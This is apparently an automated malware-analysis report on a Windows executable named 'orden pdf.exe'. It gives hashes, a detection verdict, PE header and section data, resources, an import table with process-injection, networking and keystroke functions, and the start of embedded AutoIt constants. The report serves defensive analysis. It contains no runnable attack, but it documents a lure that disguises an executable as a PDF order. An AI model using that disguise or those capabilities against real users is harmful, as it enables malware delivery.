                                            MD5:4F1AD14256CC9C420D78D69B468BAB48
                                            SHA1:7734BEEC32B17C6EF0678533CC9634BD2C890C65
                                            SHA-256:1F05B369246B2867A66ABA3CACD9DA9C2F29C03ADC4D45883C91054C35AC3345
                                            SHA-512:38DBBF685B18D2540D739B0FF74BB00F20A1E0B1C142E40B7BBB2E451F6D8EA9E992EB01F77EFF945A47BC57FB6ADA9E184DD9D6F07E732C253449509DEEEC71
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 33%
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d...........'.a....H.k....H.h.....H.i....}%....}5............~.......k......o.....1......j....Rich....................PE..L......_..........".................t_............@.......................................@...@.......@......................p..|....@.......................`..Ll..................................0'..@...............`............................text...O........................... ..`.rdata..B...........................@..@.data...T........b..................@....rsrc........@......................@..@.reloc..t....`......................@..B................................................................................................................................................................................................................................................................................................

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):6.795101471729671
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:orden pdf.exe
                                            File size:1550336
                                            MD5:4f1ad14256cc9c420d78d69b468bab48
                                            SHA1:7734beec32b17c6ef0678533cc9634bd2c890c65
                                            SHA256:1f05b369246b2867a66aba3cacd9da9c2f29c03adc4d45883c91054c35ac3345
                                            SHA512:38dbbf685b18d2540d739b0ff74bb00f20a1e0b1c142e40b7bbb2e451f6d8ea9e992eb01f77eff945a47bc57fb6ada9e184dd9d6f07e732c253449509deeec71
                                            SSDEEP:24576:Atb20pkaCqT5TBWgNQ7a23dZXEGpDMOvzgL6A:JVg5tQ7aQMg25
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                            File Icon

                                            Icon Hash:70e0baaa9696f471

                                            Static PE Info

                                            General

                                            Entrypoint:0x425f74
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                            DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE
                                            Time Stamp:0x5FFE0F2E [Tue Jan 12 21:05:50 2021 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:1
                                            File Version Major:5
                                            File Version Minor:1
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:1
                                            Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                            Entrypoint Preview

                                            Instruction
                                            call 00007F08D0B731CFh
                                            jmp 00007F08D0B661E4h
                                            int3
                                            int3
                                            push edi
                                            push esi
                                            mov esi, dword ptr [esp+10h]
                                            mov ecx, dword ptr [esp+14h]
                                            mov edi, dword ptr [esp+0Ch]
                                            mov eax, ecx
                                            mov edx, ecx
                                            add eax, esi
                                            cmp edi, esi
                                            jbe 00007F08D0B6636Ah
                                            cmp edi, eax
                                            jc 00007F08D0B666CEh
                                            bt dword ptr [004C0158h], 01h
                                            jnc 00007F08D0B66369h
                                            rep movsb
                                            jmp 00007F08D0B6667Ch
                                            cmp ecx, 00000080h
                                            jc 00007F08D0B66534h
                                            mov eax, edi
                                            xor eax, esi
                                            test eax, 0000000Fh
                                            jne 00007F08D0B66370h
                                            bt dword ptr [004BA370h], 01h
                                            jc 00007F08D0B66840h
                                            bt dword ptr [004C0158h], 00000000h
                                            jnc 00007F08D0B6650Dh
                                            test edi, 00000003h
                                            jne 00007F08D0B6651Eh
                                            test esi, 00000003h
                                            jne 00007F08D0B664FDh
                                            bt edi, 02h
                                            jnc 00007F08D0B6636Fh
                                            mov eax, dword ptr [esi]
                                            sub ecx, 04h
                                            lea esi, dword ptr [esi+04h]
                                            mov dword ptr [edi], eax
                                            lea edi, dword ptr [edi+04h]
                                            bt edi, 03h
                                            jnc 00007F08D0B66373h
                                            movq xmm1, qword ptr [esi]
                                            sub ecx, 08h
                                            lea esi, dword ptr [esi+08h]
                                            movq qword ptr [edi], xmm1
                                            lea edi, dword ptr [edi+08h]
                                            test esi, 00000007h
                                            je 00007F08D0B663C5h
                                            bt esi, 03h
                                            jnc 00007F08D0B66418h
                                            movdqa xmm1, dqword ptr [esi+00h]

                                            Rich Headers

                                            Programming Language:
                                            • [RES] VS2012 UPD4 build 61030
                                            • [ASM] VS2012 UPD4 build 61030
                                            • [ C ] VS2008 SP1 build 30729
                                            • [IMP] VS2008 SP1 build 30729
                                            • [LNK] VS2012 UPD4 build 61030

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000xb17d0.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1760000x6c4c.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x8b54f0x8b600False0.569949901906data6.68041374921IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .rdata0x8d0000x2cc420x2ce00False0.330464397632data5.77019233319IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0xba0000x9d540x6200False0.164022640306data2.00269109997IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                            .rsrc0xc40000xb17d00xb1800False0.592063710387data6.31952318701IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x1760000xa4740xa600False0.501788403614data5.24542665412IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountry
                                            RT_BITMAP0xc447c0x59802ASCII text, with very long lines, with no line terminators
                                            RT_ICON0x11dc800x128GLS_BINARY_LSB_FIRSTEnglishGreat Britain
                                            RT_ICON0x11dda80x128GLS_BINARY_LSB_FIRSTEnglishGreat Britain
                                            RT_ICON0x11ded00x128GLS_BINARY_LSB_FIRSTEnglishGreat Britain
                                            RT_ICON0x11dff80x497ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain
                                            RT_ICON0x1229780x10828dBase III DBT, version number 0, next free block index 40EnglishGreat Britain
                                            RT_ICON0x1331a00x94a8dataEnglishGreat Britain
                                            RT_ICON0x13c6480x5488dataEnglishGreat Britain
                                            RT_ICON0x141ad00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 16318463, next used block 4294917888EnglishGreat Britain
                                            RT_ICON0x145cf80x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0EnglishGreat Britain
                                            RT_ICON0x1482a00x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0EnglishGreat Britain
                                            RT_ICON0x1493480x988dataEnglishGreat Britain
                                            RT_ICON0x149cd00x468GLS_BINARY_LSB_FIRSTEnglishGreat Britain
                                            RT_RCDATA0x14a1380x2b14cdata
                                            RT_GROUP_ICON0x1752840x84dataEnglishGreat Britain
                                            RT_GROUP_ICON0x1753080x14dataEnglishGreat Britain
                                            RT_GROUP_ICON0x17531c0x14dataEnglishGreat Britain
                                            RT_GROUP_ICON0x1753300x14dataEnglishGreat Britain
                                            RT_VERSION0x1753440xdcdataEnglishGreat Britain
                                            RT_MANIFEST0x1754200x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain

                                            Imports

                                            DLLImport
                                            WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                            VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                            COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                            MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                            WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                            PSAPI.DLLGetProcessMemoryInfo
                                            IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                            USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                            UxTheme.dllIsThemeActive
                                            KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                            USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                            GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                            COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                            ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                            SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                            OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                            Version Infos

                                            DescriptionData
                                            Translation0x0809 0x04b0

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishGreat Britain

                                            Static AutoIT Info

                                            General

                                            Code:GLOBAL CONST $__DLG_WM_USER = 1024 GLOBAL CONST $BIF_BROWSEFILEJUNCTIONS = 65536 GLOBAL CONST $BIF_BROWSEFORCOMPUTER = 4096 GLOBAL CONST $BIF_BROWSEFORPRINTER = 8192 GLOBAL CONST $BIF_BROWSEINCLUDEFILES = 16384 GLOBAL CONST $BIF_BROWSEINCLUDEURLS = 128 GLOBAL CONST $BIF_DONTGOBELOWDOMAIN = 2 GLOBAL CONST $BIF_EDITBOX = 16 GLOBAL CONST $BIF_NEWDIALOGSTYLE = 64 GLOBAL CONST $BIF_NONEWFOLDERBUTTON = 512 GLOBAL CONST $BIF_NOTRANSLATETARGETS = 1024 GLOBAL CONST $BIF_RETURNFSANCESTORS = 8 GLOBAL CONST $BIF_RETURNONLYFSDIRS = 1 GLOBAL CONST $BIF_SHAREABLE = 32768 GLOBAL CONST $BIF_STATUSTEXT = 4 GLOBAL CONST $BIF_USENEWUI = BITOR ($BIF_EDITBOX , $BIF_NEWDIALOGSTYLE ) GLOBAL CONST $BIF_UAHINT = 256 GLOBAL CONST $BIF_VALIDATE = 32 GLOBAL CONST $BFFM_INITIALIZED = 1 GLOBAL CONST $BFFM_IUNKNOWN = 5 GLOBAL CONST $BFFM_SELCHANGED = 2 GLOBAL CONST $BFFM_VALIDATEFAILED = 4 GLOBAL CONST $BFFM_SETSTATUSTEXTA = $__DLG_WM_USER + 100 GLOBAL CONST $BFFM_ENABLEOK = $__DLG_WM_USER + 101 GLOBAL CONST $BFFM_SETSELECTIONA = $__DLG_WM_USER + 102 GLOBAL CONST $BFFM_SETSELECTIONW = $__DLG_WM_USER + 103 GLOBAL CONST $BFFM_SETSTATUSTEXTW = $__DLG_WM_USER + 104 GLOBAL CONST $BFFM_SETOKTEXT = $__DLG_WM_USER + 105 GLOBAL CONST $BFFM_SETEXPANDED = $__DLG_WM_USER + 106 GLOBAL CONST $CDERR_DIALOGFAILURE = 65535 GLOBAL CONST $CDERR_FINDRESFAILURE = 6 GLOBAL CONST $CDERR_INITIALIZATION = 2 GLOBAL CONST $CDERR_LOADRESFAILURE = 7 GLOBAL CONST $CDERR_LOADSTRFAILURE = 5 GLOBAL CONST $CDERR_LOCKRESFAILURE = 8 GLOBAL CONST $CDERR_MEMALLOCFAILURE = 9 GLOBAL CONST $CDERR_MEMLOCKFAILURE = 10 GLOBAL CONST $CDERR_NOHINSTANCE = 4 GLOBAL CONST $CDERR_NOHOOK = 11 GLOBAL CONST $CDERR_NOTEMPLATE = 3 GLOBAL CONST $CDERR_REGISTERMSGFAIL = 12 GLOBAL CONST $CDERR_STRUCTSIZE = 1 GLOBAL CONST $PDERR_CREATEICFAILURE = 4106 GLOBAL CONST $PDERR_DEFAULTDIFFERENT = 4108 GLOBAL CONST $PDERR_DNDMMISMATCH = 4105 GLOBAL CONST $PDERR_GETDEVMODEFAIL = 4101 GLOBAL CONST $PDERR_INITFAILURE = 4102 GLOBAL CONST $PDERR_LOADDRVFAILURE = 4100 GLOBAL CONST $PDERR_NODEFAULTPRN = 4104 GLOBAL CONST $PDERR_NODEVICES = 4103 GLOBAL CONST $PDERR_PARSEFAILURE = 4098 GLOBAL CONST $PDERR_PRINTERNOTFOUND = 4107 GLOBAL CONST $PDERR_RETDEFFAILURE = 4099 GLOBAL CONST $PDERR_SETUPFAILURE = 4097 GLOBAL CONST $CFERR_MAXLESSTHANMIN = 8194 GLOBAL CONST $CFERR_NOFONTS = 8193 GLOBAL CONST $FNERR_BUFFERTOOSMALL = 12291 GLOBAL CONST $FNERR_INVALIDFILENAME = 12290 GLOBAL CONST $FNERR_SUBCLASSFAILURE = 12289 GLOBAL CONST $FRERR_BUFFERLENGTHZERO = 16385 GLOBAL CONST $FR_DIALOGTERM = 64 GLOBAL CONST $FR_DOWN = 1 GLOBAL CONST $FR_ENABLEHOOK = 256 GLOBAL CONST $FR_ENABLETEMPLATE = 512 GLOBAL CONST $FR_ENABLETEMPLATEHANDLE = 8192 GLOBAL CONST $FR_FINDNEXT = 8 GLOBAL CONST $FR_HIDEUPDOWN = 16384 GLOBAL CONST $FR_HIDEMATCHCASE = 32768 GLOBAL CONST $FR_HIDEWHOLEWORD = 65536 GLOBAL CONST $FR_MATCHCASE = 4 GLOBAL CONST $FR_NOMATCHCASE = 2048 GLOBAL CONST $FR_NOUPDOWN = 1024 GLOBAL CONST $FR_NOWHOLEWORD = 4096 GLOBAL CONST $FR_REPLACE = 16 GLOBAL CONST $FR_REPLACEALL = 32 GLOBAL CONST $FR_SHOWHELP = 128 GLOBAL CONST $FR_WHOLEWORD = 2 GLOBAL CONST $SHFMT_ID_DEFAULT = 65535 GLOBAL CONST $SHFMT_OPT_FULL = 0 GLOBAL CONST $SHFMT_OPT_QUICKFORMAT = 1 GLOBAL CONST $SHFMT_OPT_SYSONLY = 2 GLOBAL CONST $SHFMT_ERROR = + 4294967295 GLOBAL CONST $SHFMT_CANCEL = + 4294967294 GLOBAL CONST $SHFMT_NOFORMAT = + 4294967293 GLOBAL CONST $CDM_FIRST = $__DLG_WM_USER + 100 GLOBAL CONST $CDM_GETSPEC = $CDM_FIRST GLOBAL CONST $CDM_GETFILEPATH = $CDM_FIRST + 1 GLOBAL CONST $CDM_GETFOLDERPATH = $CDM_FIRST + 2 GLOBAL CONST $CDM_GETFOLDERIDLIST = $CDM_FIRST + 3 GLOBAL CONST $CDM_SETCONTROLTEXT = $CDM_FIRST + 4 GLOBAL CONST $CDM_HIDECONTROL = $CDM_FIRST + 5 GLOBAL CONST $CDM_SETDEFEXT = $CDM_FIRST + 6 GLOBAL CONST $CDM_LAST = $__DLG_WM_USER + 200 GLOBAL CONST $CDN_FIRST = + 4294966695 GLOBAL CONST $CDN_INITDONE = $CDN_FIRST GLOBAL CONST $CDN_SELCHANGE = $CDN_FIRST + 4294967295 GLOBAL CONST $CDN_FOLDERCHANGE = $CDN_FIRST + 4294967294 GLOBAL CONST $CDN_SHAREVIOLATION = $CDN_FIRST + 4294967293 GLOBAL CONST $CDN_HELP = $CDN_FIRST + 4294967292 GLOBAL CONST $CDN_FILEOK = $CDN_FIRST + 4294967291 GLOBAL CONST $CDN_TYPECHANGE = $CDN_FIRST + 4294967290 GLOBAL CONST $CDN_INCLUDEITEM = $CDN_FIRST + 4294967289 GLOBAL CONST $CDN_LAST = + 4294966597 GLOBAL CONST $PSD_DEFAULTMINMARGINS = 0 GLOBAL CONST $PSD_DISABLEMARGINS = 16 GLOBAL CONST $PSD_DISABLEORIENTATION = 256 GLOBAL CONST $PSD_DISABLEPAGEPAINTING = 524288 GLOBAL CONST $PSD_DISABLEPAPER = 512 GLOBAL CONST $PSD_DISABLEPRINTER = 32 GLOBAL CONST $PSD_ENABLEPAGEPAINTHOOK = 262144 GLOBAL CONST $PSD_ENABLEPAGESETUPHOOK = 8192 GLOBAL CONST $PSD_ENABLEPAGESETUPTEMPLATE = 32768 GLOBAL CONST $PSD_ENABLEPAGESETUPTEMPLATEHANDLE = 131072 GLOBAL CONST $PSD_INHUNDREDTHSOFMILLIMETERS = 8 GLOBAL CONST $PSD_INTHOUSANDTHSOFINCHES = 4 GLOBAL CONST $PSD_MARGINS = 2 GLOBAL CONST $PSD_MINMARGINS = 1 GLOBAL CONST $PSD_NONETWORKBUTTON = 2097152 GLOBAL CONST $PSD_NOWARNING = 128 GLOBAL CONST $PSD_RETURNDEFAULT = 1024 GLOBAL CONST $PSD_SHOWHELP = 2048 GLOBAL CONST $WM_PSD_PAGESETUPDLG = $__DLG_WM_USER GLOBAL CONST $WM_PSD_FULLPAGERECT = $__DLG_WM_USER + 1 GLOBAL CONST $WM_PSD_MINMARGINRECT = $__DLG_WM_USER + 2 GLOBAL CONST $WM_PSD_MARGINRECT = $__DLG_WM_USER + 3 GLOBAL CONST $WM_PSD_GREEKTEXTRECT = $__DLG_WM_USER + 4 GLOBAL CONST $WM_PSD_ENVSTAMPRECT = $__DLG_WM_USER + 5 GLOBAL CONST $WM_PSD_YAFULLPAGERECT = $__DLG_WM_USER + 6 GLOBAL CONST $PD_ALLPAGES = 0 GLOBAL CONST $PD_COLLATE = 16 GLOBAL CONST $PD_CURRENTPAGE = 4194304 GLOBAL CONST $PD_DISABLEPRINTTOFILE = 524288 GLOBAL CONST $PD_ENABLEPRINTHOOK = 4096 GLOBAL CONST $PD_ENABLEPRINTTEMPLATE = 16384 GLOBAL CONST $PD_ENABLEPRINTTEMPLATEHANDLE = 65536 GLOBAL CONST $PD_ENABLESETUPHOOK = 8192 GLOBAL CONST $PD_ENABLESETUPTEMPLATE = 32768 GLOBAL CONST $PD_ENABLESETUPTEMPLATEHANDLE = 131072 GLOBAL CONST $PD_EXCLUSIONFLAGS = 16777216 GLOBAL CONST $PD_HIDEPRINTTOFILE = 1048576 GLOBAL CONST $PD_NOCURRENTPAGE = 8388608 GLOBAL CONST $PD_NONETWORKBUTTON = 2097152 GLOBAL CONST $PD_NOPAGENUMS = 8 GLOBAL CONST $PD_NOSELECTION = 4 GLOBAL CONST $PD_NOWARNING = 128 GLOBAL CONST $PD_PAGENUMS = 2 GLOBAL CONST $PD_PRINTSETUP = 64 GLOBAL CONST $PD_PRINTTOFILE = 32 GLOBAL CONST $PD_RETURNDC = 256 GLOBAL CONST $PD_RETURNDEFAULT = 1024 GLOBAL CONST $PD_RETURNIC = 512 GLOBAL CONST $PD_SELECTION = 1 GLOBAL CONST $PD_SHOWHELP = 2048 GLOBAL CONST $PD_USEDEVMODECOPIES = 262144 GLOBAL CONST $PD_USEDEVMODECOPIESANDCOLLATE = $PD_USEDEVMODECOPIES GLOBAL CONST $PD_USELARGETEMPLATE = 268435456 GLOBAL CONST $PD_RESULT_APPLY = 2 GLOBAL CONST $PD_RESULT_CANCEL = 0 GLOBAL CONST $PD_RESULT_PRINT = 1 GLOBAL CONST $EWX_LOGOFF = 0 GLOBAL CONST $EWX_POWEROFF = 8 GLOBAL CONST $EWX_REBOOT = 2 GLOBAL CONST $EWX_SHUTDOWN = 1 GLOBAL CONST $EWX_FORCE = 4 GLOBAL CONST $EWX_FORCEIFHUNG = 16 GLOBAL CONST $OAIF_ALLOW_REGISTRATION = 1 GLOBAL CONST $OAIF_REGISTER_EXT = 2 GLOBAL CONST $OAIF_EXEC = 4 GLOBAL CONST $OAIF_FORCE_REGISTRATION = 8 GLOBAL CONST $OAIF_HIDE_REGISTRATION = 32 GLOBAL CONST $OAIF_URL_PROTOCOL = 64 GLOBAL CONST $CREDUI_FLAGS_ALWAYS_SHOW_UI = 128 GLOBAL CONST $CREDUI_FLAGS_COMPLETE_USERNAME = 2048 GLOBAL CONST $CREDUI_FLAGS_DO_NOT_PERSIST = 2 GLOBAL CONST 